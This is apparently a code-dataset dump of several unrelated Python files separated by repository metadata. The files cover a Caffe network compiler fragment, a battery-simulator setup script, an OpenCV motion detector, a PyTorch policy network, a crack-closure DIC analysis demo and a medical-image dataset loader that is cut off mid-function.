op_params = np.array(myriad_perm_ord, dtype = "i4")
node = NetworkStage(layer.name, top, StorageOrder.orderZYX,
0, 0, PadStyle.none,
DataType.fp16, DataType.fp16,
get_caffe_op_type(layer),
1, 1,
1, 1,
inshape[2], inshape[1], inshape[0], # X, Y, Z
0, 0,
get_caffe_output_channels(layer, inshape, top, network),
taps, TapsOrder.orderKCHW, None,
None, # Pre Op
StageType.none, # Post Op
None, # Post Op Param 1
0, # Post Op StrideX
0, # Post Op StrideX
0, myriad_conf, args=arguments,
new_x = new_x, new_y = new_y, new_c = new_c,
opParams = op_params)
network.attach(node)
last_layer = layer
if layer.name == outputNodeName:
break
continue
if isSoftMax(layer.type):
softmax_param = np.array([(layer.softmax_param.axis)],
dtype=np.dtype("<i4"))
if(softmax_param[0] not in (1, 2)):
throw_error(ErrorTable.StageTypeNotSupported,
"Axis parameter value {0} for layer {1} of type {2}".format(
softmax_param[0], layer.name, layer.type))
softmax_node = NetworkStage(layer.name,
top,
StorageOrder.orderZYX,
0,
0,
PadStyle.none,
DataType.fp16,
DataType.fp16,
get_caffe_op_type(layer),
1,
1,
1,
1,
# X, Y, Z
inshape[2],
inshape[1],
inshape[0],
0,
0,
get_caffe_output_channels(
layer, inshape, top, network),
None,
TapsOrder.orderKCHW,
None,
None, # Pre Op
StageType.none, # Post Op
None, # Post Op Param 1
0, # Post Op StrideX
0, # Post Op StrideX
0,
myriad_conf,
args=arguments,
opParams = softmax_param)
network.attach(softmax_node)
last_layer = layer
if layer.name == outputNodeName:
break
continue
if isCrop(layer.type):
# Caffe axis storage order N, C, H, W is assumed. Where W is the
# fastest growing dimension.
crop_axis = layer.crop_param.axis
if crop_axis < 0:
crop_axis += 4
if crop_axis == 0:
throw_error(ErrorTable.AttemptedBatchMode)
crop_offset = np.array([0, 0, 0], np.dtype("<u4"))
for offset_i in range(0, 3):
if offset_i >= crop_axis - 1:
if len(layer.crop_param.offset) == 1:
crop_offset[offset_i] = layer.crop_param.offset[0]
else:
crop_offset[offset_i] = \
layer.crop_param.offset[offset_i - (crop_axis - 1)]
# MvTensor crops a 3D volume with dimensions XYZ and storage
# order S.
# Toolkit/MvTensor axis storage order is assumed to be (N)HWC.
# Where the fastes groing dimension is C. Hence X = H, Y = W,
# Z = C and N = 1 always.
# The offset structure has the order: offset_X, offset_Y,
# offset_Z hence the parameters array has to be:
# [offset_H, oofset_W, offset_Z]
crop_offset = np.array([crop_offset[2], crop_offset[1],
crop_offset[0]], dtype=np.dtype("<u4"))
ref_bottom = network.search_several(layer.bottom[1])
ref_bottom_dimX = ref_bottom.outputDimX
ref_bottom_dimY = ref_bottom.outputDimY
ref_bottom_dimZ = ref_bottom.outputDimZ
# Using the new_x, new_y, new_c as in reshape to set the
# output dimensions and pass the parameters to the crop
# function.
ref_dims = {
0: (ref_bottom_dimX, ref_bottom_dimY, ref_bottom_dimZ),
1: (ref_bottom_dimX, ref_bottom_dimY, inshape[0]),
2: (ref_bottom_dimX, inshape[1], inshape[0])
}
# Call with crop_axis - 1 becaue in caffe first axis is
# batch size.
(new_x, new_y, new_c) = ref_dims.get(crop_axis - 1)
crop_node = NetworkStage(layer.name,
top, StorageOrder.orderZYX,
0,
0,
PadStyle.none,
DataType.fp16,
DataType.fp16,
get_caffe_op_type(layer),
1,
1,
1,
1,
# X, Y, Z
inshape[2],
inshape[1],
inshape[0],
0,
0,
get_caffe_output_channels(
layer, inshape, top, network),
None,
TapsOrder.orderKCHW,
None,
None, # Pre Op
StageType.none, # Post Op
None, # Post Op Param 1
0, # Post Op StrideX
0, # Post Op StrideX
0,
myriad_conf,
args=arguments,
new_x=new_x,
new_y=new_y,
new_c=new_c,
opParams=crop_offset)
network.attach(crop_node)
last_layer = layer
if layer.name == outputNodeName:
break
continue
if (isConcat(layer.type) or (isConvolution(layer.type) and get_caffe_kernel_size(layer)[0] > 1) or (
isDeconvolution(layer.type) and get_caffe_kernel_size(layer)[0] > 1)) and len(curslicing) > 0:
# Concat of slicing, cannot work, we have to add the slice layer
# Convolution also does not support input strides
# Convolution dilation is not supported for slicing.
conv_dilation = 1
layer_params = np.array([conv_dilation], dtype=np.dtype("<i4"))
for slice in curslicing:
for i in range(len(top)):
if top[i] == slice[0]:
slicename = layer.name + '_Slice' + \
str(slice[1]) + '_' + str(slice[2])
network.attach(
NetworkStage(slicename,
[slice[0]],
StorageOrder.orderZYX,
0,
0,
PadStyle.caffe,
DataType.fp16,
DataType.fp16,
StageType.copy,
1,
1,
1,
1,
inshape[2],
inshape[1],
inshape[0],
1,
1,
slice[2] - slice[1],
None,
TapsOrder.orderKCHW,
None,
None,
StageType.none,
None,
0,
0,
curslicing,
myriad_conf,
args=arguments,
opParams=layer_params)
)
top[i] = slicename
if arguments.explicit_concat and isConcat(layer.type):
outstride = 2 * sum(prev_output_shape[idx][0]
for idx in range(len(top)))
for idx, prev in enumerate(top):
if idx == 0:
substagename = layer.name
else:
substagename = layer.name + '_' + \
('input' if prev is None else prev)
node = NetworkStage(
substagename,
top if idx == 0 else [
top[idx]],
StorageOrder.orderZYX,
0,
0,
PadStyle.caffe,
DataType.fp16,
DataType.fp16,
StageType.copy,
1,
1,
1,
1,
prev_output_shape[idx][2],
prev_output_shape[idx][1],
prev_output_shape[idx][0],
1,
1,
prev_output_shape[idx][0],
None,
TapsOrder.orderKCHW,
None,
None,
StageType.none,
None,
0,
0,
curslicing,
myriad_conf,
args=arguments)
if idx == 0:
firstnode = node
network.attach(node)
if idx == 0:
if layer.name == outputNodeName:
outputPointer, outputIndex = node.setoutput(
outstride, 0, MemoryIndex.output.value)
else:
outputPointer, outputIndex = node.setoutput(outstride)
else:
node.setoutput(outstride, outputPointer, outputIndex)
outputPointer = outputPointer + 2 * prev_output_shape[idx][0]
if layer.name == outputNodeName:
firstnode.isoutput = True
break
continue
if isDepthwiseConvolution(layer, get_caffe_output_channels(
layer, inshape, top, network), inshape[0]):
depthwise_node = NetworkStage(layer.name, top,
StorageOrder.orderZYX, # s_order,
# pad_x, pad_y, pad_type,
get_caffe_op_padding(layer)[0],
get_caffe_op_padding(layer)[1],
PadStyle.caffe,
# dtype, precision,
DataType.fp16,
DataType.fp16,
# op_type
StageType.depthwise_convolution,
# op_x, op_y
get_caffe_op_radix(layer)[0],
get_caffe_op_radix(layer)[1],
# sx, sy
get_caffe_op_stride(layer)[0],
get_caffe_op_stride(layer)[1],
# x, y, c
inshape[2],
inshape[1],
inshape[0],
# fh, fw
get_caffe_kernel_size(layer)[0],
get_caffe_kernel_size(layer)[1],
# Output Channels (K)
get_caffe_output_channels(
layer, inshape, top, network),
# taps, taps_order
get_caffe_params(
layer, net.params)[0],
TapsOrder.orderKCHW,
# bias, pre_op_type, post_op_type,
get_caffe_params(
layer, net.params)[1],
None,
None,
# post_1, post_sx, post_sy, slicing = None
0,
0,
0,
None,
myriad_conf,
args=arguments)
network.attach(depthwise_node)
last_layer = layer
if layer.name == outputNodeName:
break
continue
if (
not isReLU(layer.type) and not
isConcat(layer.type) and not
isSlice(layer.type) and not
isELU(layer.type) and not
isDepthwiseConvolution(
layer,
get_caffe_output_channels(
layer,
inshape,
top,
network),
inshape[0])):
layer_params = None
if(isConvolution(layer.type) or isDeconvolution(layer.type)):
# Currently only equal dilation on all axes is supported.
conv_dilation = 1
if(len(layer.convolution_param.dilation) > 0):
conv_dilation = layer.convolution_param.dilation[0]
layer_params = np.array([conv_dilation], dtype=np.dtype("<i4"))
ngroups = get_caffe_group(layer)
addednodes = []
addednames = []
for group in range(ngroups):
taps = get_caffe_params(layer, net.params)[0]
if(isDeconvolution(layer.type)):
# For Deconv the wheights are in CKHW format.
# Transform to KCWH
taps = np.swapaxes(taps, 0, 1)
# Taps need to be roated in the HW plane because caffe
# implements the deconvolution via convolution backward pass
# which does an 180deg rotation.
taps = taps[:,:,::-1,::-1]
bias = get_caffe_params(layer, net.params)[1]
prev = top
layername = layer.name
if ngroups > 1: # Warning: group convolution cannot follow slice
curslicing = []
curslicing.append([(top[0] if top is not None else None),
inshape[0] // ngroups * group,
inshape[0] // ngroups * (group + 1)])
if(isDeconvolution(layer.type)):
taps = taps[:, taps.shape[1] // ngroups *
group: taps.shape[1] // ngroups * (group + 1), ]
else:
taps = taps[taps.shape[0] // ngroups *
group: taps.shape[0] // ngroups * (group + 1), ]
if bias is not None:
bias = bias[bias.shape[0] // ngroups *
group: bias.shape[0] // ngroups * (group + 1), ]
if get_caffe_kernel_size(layer)[0] > 1:
if top is None:
slicename = 'input'
else:
slicename = top[0] if isinstance(
top[0], str) else top[0][0]
slicename = slicename + '_s' + str(group)
network.attach(
NetworkStage(
slicename,
top,
StorageOrder.orderZYX,
0,
0,
PadStyle.caffe,
DataType.fp16,
DataType.fp16,
StageType.copy,
1,
1,
1,
1,
inshape[2],
inshape[1],
inshape[0],
1,
1,
inshape[0] // ngroups,
None,
TapsOrder.orderKCHW,
None,
None,
StageType.none,
None,
0,
0,
curslicing,
myriad_conf,
args=arguments,
opParams=layer_params))
prev = [slicename]
addednames.append(layer.name + '_p' + str(group))
layername = layer.name + '_p' + str(group)
node = NetworkStage(
# Name, Top, Order
layername,
prev,
StorageOrder.orderZYX,
# Padding
get_caffe_op_padding(layer)[0],
get_caffe_op_padding(layer)[1],
PadStyle.caffe,
DataType.fp16, DataType.fp16,
# Op, StrideX, StrideY
get_caffe_op_type(layer),
get_caffe_op_radix(layer)[0],
get_caffe_op_radix(layer)[1],
get_caffe_op_stride(layer)[0],
get_caffe_op_stride(layer)[1],
# X, Y, Z
inshape[2],
inshape[1],
inshape[0],
# fh, fw
get_caffe_kernel_size(layer)[0],
get_caffe_kernel_size(layer)[1],
# Output Channels (K)
get_caffe_output_channels(
layer, inshape, top, network) // ngroups,
taps,
TapsOrder.orderKCHW,
bias,
None, # Pre Op
StageType.none, # Post Op
None, # Post Op Param 1
0, # Post Op StrideX
0, # Post Op StrideX
curslicing,
myriad_conf,
args=arguments,
opParams=layer_params
)
network.attach(node)
addednodes.append(node)
if ngroups > 1:
if idx == nlayers - 1:
NetworkStage.concat(addednodes)
else:
concat_tracker.append((layer.name, addednames))
else:
caffe_apply_minor_op(network, layer, top)
last_layer = layer
if layer.name == outputNodeName:
break
if last_layer.type == 'Concat':
nodes = network.search_several(last_layer.bottom)
NetworkStage.concat(nodes)
if(isDetectionOutput(last_layer.type)):
network.outputIsSsdDetOut = True
if outputNodeName is not None:
if inputNodeName is not None:
# Ensure we have the same inputs for each method
net.blobs[input_bottom].data[...] = input_data
try:
net.forward(start=startNodeName, end=outputNodeName)
except BaseException:
throw_error(ErrorTable.NoOutputNode,
outputNodeName + "/" + startNodeName)
else:
# Ensure we have the same inputs for each method
net.blobs['data'].data[...] = input_data
try:
net.forward(end=outputNodeName)
except BaseException:
throw_error(ErrorTable.NoOutputNode, outputNodeName)
else:
if inputNodeName is not None:
# Ensure we have the same inputs for each method
net.blobs[input_bottom].data[...] = input_data
net.forward(start=startNodeName)
else:
# Ensure we have the same inputs for each method
net.blobs['data'].data[...] = input_data
net.forward()
if file_gen:
try:
np.save(filename + "_expected.npy",
net.blobs[outputNodeName].data[0].astype(dtype=np.float16))
except BaseException:
throw_error(ErrorTable.NoOutputNode, extra=net.blobs.keys())
caffe_output_shape = net.blobs[outputNodeName].data.shape
output_shape = np.ones(3, dtype = "i4")
# Substract 1 because caffe output will (almost)always have the batch dimension.
output_shape_len = len(caffe_output_shape) - 1
output_shape[0 : output_shape_len] = caffe_output_shape[1:]
network.outputTensor = zyx_to_yxz_dimension_only(output_shape)
return network
| 43.081379
| 119
| 0.445572
|
cf62f3e5d53a951036b2ae04edaea894a2cc712e
| 1,433
|
py
|
Python
|
setup.py
|
macklenc/mtnlion
|
ba2e93faeed3004d344a8c14f37a409da572271d
|
[
"MIT"
] | null | null | null |
setup.py
|
macklenc/mtnlion
|
ba2e93faeed3004d344a8c14f37a409da572271d
|
[
"MIT"
] | 174
|
2018-05-11T13:00:10.000Z
|
2021-11-15T17:47:29.000Z
|
setup.py
|
macklenc/mtnlion
|
ba2e93faeed3004d344a8c14f37a409da572271d
|
[
"MIT"
] | 1
|
2018-05-13T11:11:15.000Z
|
2018-05-13T11:11:15.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""The setup script."""
from setuptools import find_packages, setup
with open("README.rst") as readme_file:
readme = readme_file.read()
with open("HISTORY.rst") as history_file:
history = history_file.read()
requirements = ["Click>=6.0", "numpy", "matplotlib", "munch", "scipy", "xlrd", "sympy"]
setup_requirements = ["pytest-runner"]
test_requirements = ["pytest"]
setup(
author="Christopher Macklen",
author_email="cmacklen@uccs.edu",
classifiers=[
"Development Status :: 2 - Pre-Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Programming Language :: Python :: 3.6",
],
description="Mountain Lion Continuum-Scale Lithium-Ion Cell Simulator uses FEniCS to solve partial differential "
"equations for the internal states of Lithium-Ion cells.",
entry_points={"console_scripts": ["mtnlion=mtnlion.cli:main"]},
install_requires=requirements,
license="MIT license",
long_description=readme + "\n\n" + history,
include_package_data=True,
keywords="mtnlion",
name="mtnlion",
packages=find_packages(include=["mtnlion"]),
setup_requires=setup_requirements,
test_suite="tests",
tests_require=test_requirements,
url="https://github.com/macklenc/mtnlion",
version="0.0.1",
zip_safe=False,
)
| 30.489362
| 117
| 0.675506
|
7f72cd96a94af2b4db800f5947dbbbfd9634035e
| 71
|
py
|
Python
|
sherry/view/digital/__init__.py
|
py-mu/sherry
|
af1e95f1eada663ba3b3fb607ca88f099f894f36
|
[
"MIT"
] | 1
|
2021-06-27T05:54:23.000Z
|
2021-06-27T05:54:23.000Z
|
sherry/view/digital/__init__.py
|
py-mu/sherry
|
af1e95f1eada663ba3b3fb607ca88f099f894f36
|
[
"MIT"
] | null | null | null |
sherry/view/digital/__init__.py
|
py-mu/sherry
|
af1e95f1eada663ba3b3fb607ca88f099f894f36
|
[
"MIT"
] | 1
|
2021-07-28T09:00:43.000Z
|
2021-07-28T09:00:43.000Z
|
# coding=utf-8
"""
create by pymu
on 2021/8/12
at 20:35
"""
| 11.833333
| 18
| 0.521127
|
2ef293a98bf7b6aa997f0a5080714676031bbf4a
| 1,723
|
py
|
Python
|
modules/push.py
|
ak-oz007/Beyond-Infinity_Abishek-M-K
|
b5e5474a6916edf69a88b4462c5694901b50f4c7
|
[
"Apache-2.0"
] | null | null | null |
modules/push.py
|
ak-oz007/Beyond-Infinity_Abishek-M-K
|
b5e5474a6916edf69a88b4462c5694901b50f4c7
|
[
"Apache-2.0"
] | null | null | null |
modules/push.py
|
ak-oz007/Beyond-Infinity_Abishek-M-K
|
b5e5474a6916edf69a88b4462c5694901b50f4c7
|
[
"Apache-2.0"
] | null | null | null |
import cv2
import numpy as np
def push(cap):
# cap = cv2.VideoCapture('D:\\Downloads\\5_1_5.avi')
frame_width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
frame_height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fourcc = cv2.VideoWriter_fourcc('X', 'V', 'I', 'D')
out = cv2.VideoWriter("output.avi", fourcc, 5.0, (1280, 720))
ret, frame1 = cap.read()
ret, frame2 = cap.read()
# print(frame1.shape)
while cap.isOpened():
diff = cv2.absdiff(frame1, frame2)
gray = cv2.cvtColor(diff, cv2.COLOR_BGR2GRAY)
blur = cv2.GaussianBlur(gray, (5, 5), 0)
_, thresh = cv2.threshold(blur, 20, 255, cv2.THRESH_BINARY)
dilated = cv2.dilate(thresh, None, iterations=3)
contours, _ = cv2.findContours(dilated, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
for contour in contours:
(x, y, w, h) = cv2.boundingRect(contour)
if cv2.contourArea(contour) < 900:
continue
cv2.rectangle(frame1, (x, y), (x + w, y + h), (0, 255, 0), 2)
cv2.putText(frame1, "walking {}".format('pushing'), (10, 20), cv2.FONT_HERSHEY_SIMPLEX,
1, (0, 0, 255), 3)
# cv2.drawContours(frame1, contours, -1, (0, 255, 0), 2)
return True
cv2.drawContours(frame1, contours, -1, (0, 255, 0), 2)
image = cv2.resize(frame1, (1280, 720))
out.write(image)
cv2.imshow("feed", frame1)
frame1 = frame2
ret, frame2 = cap.read()
if cv2.waitKey(40) == 27:
return False
# break
cap.wait(1000)
cv2.destroyAllWindows()
# cap.release()
out.release()
| 34.46
| 100
| 0.557168
|
fabe536be607b5bb7e09b48ea5c7e45822eec459
| 2,557
|
py
|
Python
|
codes/model/expert_policy/normal_mlp.py
|
shagunsodhani/consistent-dynamics
|
cc1527f2468cdcebea9a57387254278eb5547fe3
|
[
"MIT"
] | 8
|
2019-05-06T13:30:57.000Z
|
2020-05-25T20:32:47.000Z
|
codes/model/expert_policy/normal_mlp.py
|
shagunsodhani/consistent-dynamics
|
cc1527f2468cdcebea9a57387254278eb5547fe3
|
[
"MIT"
] | null | null | null |
codes/model/expert_policy/normal_mlp.py
|
shagunsodhani/consistent-dynamics
|
cc1527f2468cdcebea9a57387254278eb5547fe3
|
[
"MIT"
] | 2
|
2019-05-06T15:11:42.000Z
|
2020-03-06T12:36:16.000Z
|
import os
import numpy as np
import torch
import torch.nn as nn
from torch.distributions import Normal
from codes.model.expert_policy.utils import RunningMeanStd
class NormalMLPPolicy(nn.Module):
def __init__(self, input_size, output_size, hidden_size, num_layers,
nonlinearity=nn.Tanh):
super(NormalMLPPolicy, self).__init__()
self.input_size = input_size
self.output_size = output_size
self.hidden_size = hidden_size
self.num_layers = num_layers
self.nonlinearity = nonlinearity
layers = []
for i in range(num_layers):
input_dim = input_size if i == 0 else hidden_size
layers.append(nn.Linear(input_dim, hidden_size, bias=True))
layers.append(nonlinearity())
self.layers = nn.Sequential(*layers)
self.mean = nn.Linear(hidden_size, output_size, bias=True)
self.logstd = nn.Parameter(torch.zeros(output_size))
self.obs_rms = RunningMeanStd(shape=(input_size,), dtype=torch.float64)
def forward(self, inputs):
normalized_inputs = self.obs_rms(inputs)
normalized_inputs = torch.clamp(normalized_inputs, -5.0, 5.0)
outputs = self.layers(normalized_inputs)
mean = self.mean(outputs)
return Normal(loc=mean, scale=torch.exp(self.logstd))
def load_weights(self, config_dict):
expert_policy_config = config_dict.model.expert_policy
name = '{0}__{1}'.format(config_dict.env.name, expert_policy_config.name)
# Load the Pytorch model
with open(os.path.join(expert_policy_config.save_dir, '{0}.pt'.format(name)), 'wb') as f:
self.load_state_dict(torch.load())
def sample_action(self, input):
return self.forward(input).mean.detach().numpy()
def get_model_using_config_dict(config_dict):
expert_policy_config = config_dict.model.expert_policy
model = NormalMLPPolicy(input_size=int(np.prod(config_dict.env.observation_space.shape)),
output_size=int(np.prod(config_dict.env.action_space.shape)),
hidden_size=expert_policy_config.hidden_size,
num_layers=expert_policy_config.num_layers,
nonlinearity=nn.Tanh)
name = '{0}__{1}'.format(config_dict.env.name, expert_policy_config.name)
file_name = os.path.join(expert_policy_config.save_dir, '{0}.th.pt'.format(name))
model.load_state_dict(torch.load(file_name))
print("Model loaded successfully.")
return model
| 38.742424
| 97
| 0.67501
|
6c74b95a2f66a0a94c4fa75d909cc1024ffa0b68
| 7,021
|
py
|
Python
|
demos/test_process_dic.py
|
VibroSim/closure_measurements
|
3c5560db85e0e9e276aaccc06c49c63224dbddca
|
[
"MIT"
] | null | null | null |
demos/test_process_dic.py
|
VibroSim/closure_measurements
|
3c5560db85e0e9e276aaccc06c49c63224dbddca
|
[
"MIT"
] | null | null | null |
demos/test_process_dic.py
|
VibroSim/closure_measurements
|
3c5560db85e0e9e276aaccc06c49c63224dbddca
|
[
"MIT"
] | null | null | null |
import sys
import os
import multiprocessing
import numpy as np
from matplotlib import pyplot as pl
from function_as_script import scriptify
from closure_measurements.process_dic import load_dgs
from closure_measurements.process_dic import Calc_CTODs as calc_CTODs_function
from closure_measurements.process_dic import CalcInitialModel as CalcInitialModel_function
from closure_measurements.process_dic import InitializeFullModel as InitializeFullModel_function
from closure_measurements.process_dic import CalcFullModel as CalcFullModel_function
from closure_measurements.process_dic import TestRegistration
import pyopencl as cl
#Calc_CTODs=scriptify(calc_CTODs_function)
#CalcInitialModel=scriptify(CalcInitialModel_function)
#CalcFullModel=scriptify(CalcFullModel_function)
Calc_CTODs=calc_CTODs_function
CalcInitialModel=CalcInitialModel_function
InitializeFullModel=InitializeFullModel_function
CalcFullModel=CalcFullModel_function
# Probably want to run view_dic_input on the same data file
# prior to running this to set TipCoords1 and 2 and XRange.
#
# using view_dic_input you can click on points in the plots
# and it will print out the coordinates in meters,
# suitable for use in
if __name__=="__main__":
#dgsfilename = "/tmp/C18-AFVT-018J_optical_collect_optical_data_dic.dgs"
#dgsfilename = "/tmp/C18-AFVT-011X_optical_collect_optical_data_dic.dgs"
#dgsfilename = "/tmp/0000-C18-AFVT-018J_optical_collect_optical_data_dic.dgs"
dgsfilename = "/tmp/0001-C14-UTCA-013E_optical_collect_optical_data_dic.dgs.bz2"
dic_fullmodel_optimization=True
YoungsModulus=113.8e9 # 113.8 GPa for Ti-6-4
# YoungsModulus=200.0e9 # 200 GPa for In718
dic_span=20 # formerly step... this is measured in the scaled piexels
dic_smoothing_window=3 # formerly window... This is measured in the scaled pixels
min_dic_points_per_meter=40000
nominal_length=2e-3 # nominal crack length, for nondimensional normalization
if dic_fullmodel_optimization:
nominal_modulus=100.0e9 # nominal modulus
pass
nominal_stress=50e6 # nominal stress
tip_tolerance = 100e-6 # 100 microns
Symmetric_COD=True # assume a symmetric form for the COD -- appropriate when the data is from surface cracks of length 2a where the center is (roughly) a symmetry point
if dic_fullmodel_optimization:
ctx = cl.create_some_context() # set ctx and dev equal to None in order to disable OpenCL acceleration
dev = ctx.devices[0]
print("Using accelerator \"%s\" for fullmodel optimization" % (dev.name))
pass
else:
ctx = None
dev = None
pass
(dic_dx,dic_dy,
dic_nx,dic_ny,
XRangeSize,
nloads,
Xinivec,Xposvecs,
load1,load2,u_disps,v_disps,
ROI_out_arrays,
CrackCenterCoords,TipCoords1,TipCoords2,
ROI_dic_yminidx,ROI_dic_ymaxidx,
relshift_middleimg_lowerleft_corner_x_ref,
relshift_middleimg_lowerleft_corner_x_diff,
relshift_middleimg_lowerleft_corner_y_ref,
relshift_middleimg_lowerleft_corner_y_diff) = load_dgs(dgsfilename)
#print(TipCoords1)
#print(TipCoords1[1])
#print(TipCoords2)
#print(TipCoords2[1])
CTODs = Calc_CTODs(dic_nx,nloads,XRangeSize,Xposvecs,v_disps,ROI_out_arrays,ROI_dic_yminidx,ROI_dic_ymaxidx,dic_span,dic_smoothing_window)
(InitialModels_side1,
InitialCoeffs_side1,
Error_side1,
npoints_side1,
XPositions_side1,
CTODValues_side1) = CalcInitialModel(nloads,CTODs,load1,load2,Xposvecs,CrackCenterCoords,dic_dy,dic_span,Symmetric_COD,1,YoungsModulus,relshift_middleimg_lowerleft_corner_x_ref=relshift_middleimg_lowerleft_corner_x_ref,nominal_length=nominal_length,nominal_stress=nominal_stress,doplots=True)
(InitialModels_side2,
InitialCoeffs_side2,
Error_side2,
npoints_side2,
XPositions_side2,
CTODValues_side2) = CalcInitialModel(nloads,CTODs,load1,load2,Xposvecs,CrackCenterCoords,dic_dy,dic_span,Symmetric_COD,2,YoungsModulus,relshift_middleimg_lowerleft_corner_x_ref=relshift_middleimg_lowerleft_corner_x_ref,nominal_length=nominal_length,nominal_stress=nominal_stress,doplots=True)
(minload_side1,maxload_side1,seed_param_side1,lowest_avg_load_used_side1,fm_plots,fm_plotdata_side1) = InitializeFullModel(load1,load2,TipCoords1,TipCoords2,InitialCoeffs_side1,Error_side1,npoints_side1,XPositions_side1,CTODValues_side1,InitialModels_side1,CrackCenterCoords,tip_tolerance,min_dic_points_per_meter,Symmetric_COD,side=1,doplots=True)
(minload_side2,maxload_side2,seed_param_side2,lowest_avg_load_used_side2,fm_plots,fm_plotdata_side2) = InitializeFullModel(load1,load2,TipCoords1,TipCoords2,InitialCoeffs_side2,Error_side2,npoints_side2,XPositions_side2,CTODValues_side2,InitialModels_side2,CrackCenterCoords,tip_tolerance,min_dic_points_per_meter,Symmetric_COD,side=2,doplots=True)
if dic_fullmodel_optimization:
(full_model_params_side1,full_model_result_side1,full_model_optim_plots_side1) = CalcFullModel(load1,load2,InitialCoeffs_side1,Error_side1,npoints_side1,XPositions_side1,CTODValues_side1,InitialModels_side1,CrackCenterCoords,Symmetric_COD,side=1,minload=minload_side1,maxload=maxload_side1,seed_param=seed_param_side1,nominal_length=nominal_length,nominal_modulus=nominal_modulus,nominal_stress=nominal_stress,doplots=True,fm_plotdata=fm_plotdata_side1,opencl_ctx=ctx,opencl_dev=dev)
(full_model_params_side2,full_model_result_side2,full_model_optim_plots_side2) = CalcFullModel(load1,load2,InitialCoeffs_side2,Error_side2,npoints_side2,XPositions_side2,CTODValues_side2,InitialModels_side2,CrackCenterCoords,Symmetric_COD,side=2,minload=minload_side2,maxload=maxload_side2,seed_param=seed_param_side2,nominal_length=nominal_length,nominal_modulus=nominal_modulus,nominal_stress=nominal_stress,doplots=True,fm_plotdata=fm_plotdata_side2,opencl_ctx=ctx,opencl_dev=dev)
pass
if relshift_middleimg_lowerleft_corner_x_ref is not None:
# Only applies to DIC dgs files generated through dc_process that have additional registration info added!
TestRegistration(nloads,Xposvecs,u_disps,v_disps,
ROI_out_arrays,
relshift_middleimg_lowerleft_corner_x_ref=relshift_middleimg_lowerleft_corner_x_ref,
relshift_middleimg_lowerleft_corner_x_diff=relshift_middleimg_lowerleft_corner_x_diff,
relshift_middleimg_lowerleft_corner_y_ref=relshift_middleimg_lowerleft_corner_y_ref,
relshift_middleimg_lowerleft_corner_y_diff=relshift_middleimg_lowerleft_corner_y_diff)
pass
## Plot diagnostics...
# Should have at least one plot that evaluates
# overall performance in fitting the entire data set.
#
# ... how to collapse it down to 2D?
# (Could add additional lines to the InitialModel plots...)
#pl.figure()
pl.show()
pass
| 45.296774
| 491
| 0.79604
|
8f3d209e6c6c2bf39050c221f1b255356ac48559
| 4,943
|
py
|
Python
|
code/dataloaders/dataset.py
|
tea321000/SSL4MIS
|
8d1b0be08cf089943481a47877b36eb6405fffb2
|
[
"MIT"
] | null | null | null |
code/dataloaders/dataset.py
|
tea321000/SSL4MIS
|
8d1b0be08cf089943481a47877b36eb6405fffb2
|
[
"MIT"
] | null | null | null |
code/dataloaders/dataset.py
|
tea321000/SSL4MIS
|
8d1b0be08cf089943481a47877b36eb6405fffb2
|
[
"MIT"
] | null | null | null |
import os
import cv2
import torch
import random
import numpy as np
from glob import glob
from torch.utils.data import Dataset
import h5py
from scipy.ndimage.interpolation import zoom
import itertools
from scipy import ndimage
from torch.utils.data.sampler import Sampler
class BaseDataSets(Dataset):
def __init__(self, base_dir=None, split='train', num=None, transform=None):
self._base_dir = base_dir
self.sample_list = []
self.split = split
self.transform = transform
if self.split == 'train':
with open(self._base_dir + '/train_slices.list', 'r') as f1:
self.sample_list = f1.readlines()
self.sample_list = [item.replace('\n', '')
for item in self.sample_list]
elif self.split == 'val':
with open(self._base_dir + '/val.list', 'r') as f:
self.sample_list = f.readlines()
self.sample_list = [item.replace('\n', '')
for item in self.sample_list]
if num is not None and self.split == "train":
self.sample_list = self.sample_list[:num]
print("total {} samples".format(len(self.sample_list)))
def __len__(self):
return len(self.sample_list)
def __getitem__(self, idx):
case = self.sample_list[idx]
if self.split == "train":
h5f = h5py.File(self._base_dir +
"/data/slices/{}.h5".format(case), 'r')
else:
h5f = h5py.File(self._base_dir + "/data/{}.h5".format(case), 'r')
image = h5f['image'][:]
label = h5f['label'][:]
sample = {'image': image, 'label': label}
if self.split == "train":
sample = self.transform(sample)
sample["idx"] = idx
return sample
def random_rot_flip(image, label):
k = np.random.randint(0, 4)
image = np.rot90(image, k)
label = np.rot90(label, k)
axis = np.random.randint(0, 2)
image = np.flip(image, axis=axis).copy()
label = np.flip(label, axis=axis).copy()
return image, label
def random_rotate(image, label):
angle = np.random.randint(-20, 20)
image = ndimage.rotate(image, angle, order=0, reshape=False)
label = ndimage.rotate(label, angle, order=0, reshape=False)
return image, label
class RandomGenerator(object):
def __init__(self, output_size):
self.output_size = output_size
def __call__(self, sample):
image, label = sample['image'], sample['label']
# ind = random.randrange(0, img.shape[0])
# image = img[ind, ...]
# label = lab[ind, ...]
if random.random() > 0.5:
image, label = random_rot_flip(image, label)
elif random.random() > 0.5:
image, label = random_rotate(image, label)
x, y = image.shape
image = zoom(
image, (self.output_size[0] / x, self.output_size[1] / y), order=0)
label = zoom(
label, (self.output_size[0] / x, self.output_size[1] / y), order=0)
image = torch.from_numpy(
image.astype(np.float32)).unsqueeze(0)
label = torch.from_numpy(label.astype(np.uint8))
sample = {'image': image, 'label': label}
return sample
class TwoStreamBatchSampler(Sampler):
"""Iterate two sets of indices
An 'epoch' is one iteration through the primary indices.
During the epoch, the secondary indices are iterated through
as many times as needed.
"""
def __init__(self, primary_indices, secondary_indices, batch_size, secondary_batch_size):
self.primary_indices = primary_indices
self.secondary_indices = secondary_indices
self.secondary_batch_size = secondary_batch_size
self.primary_batch_size = batch_size - secondary_batch_size
assert len(self.primary_indices) >= self.primary_batch_size > 0
assert len(self.secondary_indices) >= self.secondary_batch_size > 0
def __iter__(self):
primary_iter = iterate_once(self.primary_indices)
secondary_iter = iterate_eternally(self.secondary_indices)
return (
primary_batch + secondary_batch
for (primary_batch, secondary_batch)
in zip(grouper(primary_iter, self.primary_batch_size),
grouper(secondary_iter, self.secondary_batch_size))
)
def __len__(self):
return len(self.primary_indices) // self.primary_batch_size
def iterate_once(iterable):
return np.random.permutation(iterable)
def iterate_eternally(indices):
def infinite_shuffles():
while True:
yield np.random.permutation(indices)
return itertools.chain.from_iterable(infinite_shuffles())
def grouper(iterable, n):
